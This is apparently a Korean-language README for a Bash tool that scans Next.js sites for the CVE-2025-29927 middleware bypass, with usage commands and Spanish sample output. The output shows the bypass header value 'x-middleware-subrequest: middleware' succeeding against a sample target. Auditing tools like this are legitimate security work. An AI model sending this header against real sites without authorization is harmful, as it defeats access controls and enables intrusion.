
CVE-2025-29927 익스플로잇 체커
Zhero Web Security의 연구에 기반하여 Next.js 애플리케이션이 **미들웨어 우회(CVE-2025-29927)**에 취약한지 자동으로 탐지하는 Bash 기반 자동화 도구입니다.
bashwhatwebcurlDebian/Ubuntu에서 다음과 같이 설치하세요:
sudo apt install whatweb curl
./CVE-2025-29927.sh -u https://example.com
각 줄에 하나의 URL을 포함하는 urls.txt 파일을 생성하세요:
https://target1.com
https://target2.com
실행:
./nextjs_bypass_checker_v2.sh -l urls.txt
Next.js 식별
whatweb을 사용하여 기술 스택 탐지./_next/static/BUILD_ID 및 _buildManifest.js 읽기 시도.미들웨어 감지
X-Middleware-RewriteX-Middleware-Set-Cookie우회 테스트
x-middleware-subrequest 없이 요청을 보내 헤더를 감지.[*] Analizando: https://victima.com
[+] WhatWeb:
-> Detectado: Next.js[12.2.0]
[+] BUILD_ID: 3fjd92hf8
[+] Versión detectada: 12.2.0
[+] Middleware activo (cabeceras detectadas):
X-Middleware-Rewrite: /not-found/locale=en
[+] Probando exploits:
-> x-middleware-subrequest: middleware -> ✅ BYPASS EXITOSO (cabeceras desaparecieron)
-> x-middleware-subrequest: src/middleware -> ❌ Middleware no evadido
[*] Finalizado: https://victima.com
이 스크립트는 교육 목적 및 승인된 감사만을 위한 것입니다. 동의 없이 대상에 사용하지 마십시오. 오용은 불법 행위가 될 수 있습니다.
Zhero Web Security의 연구에 기반함: Zhero Web Security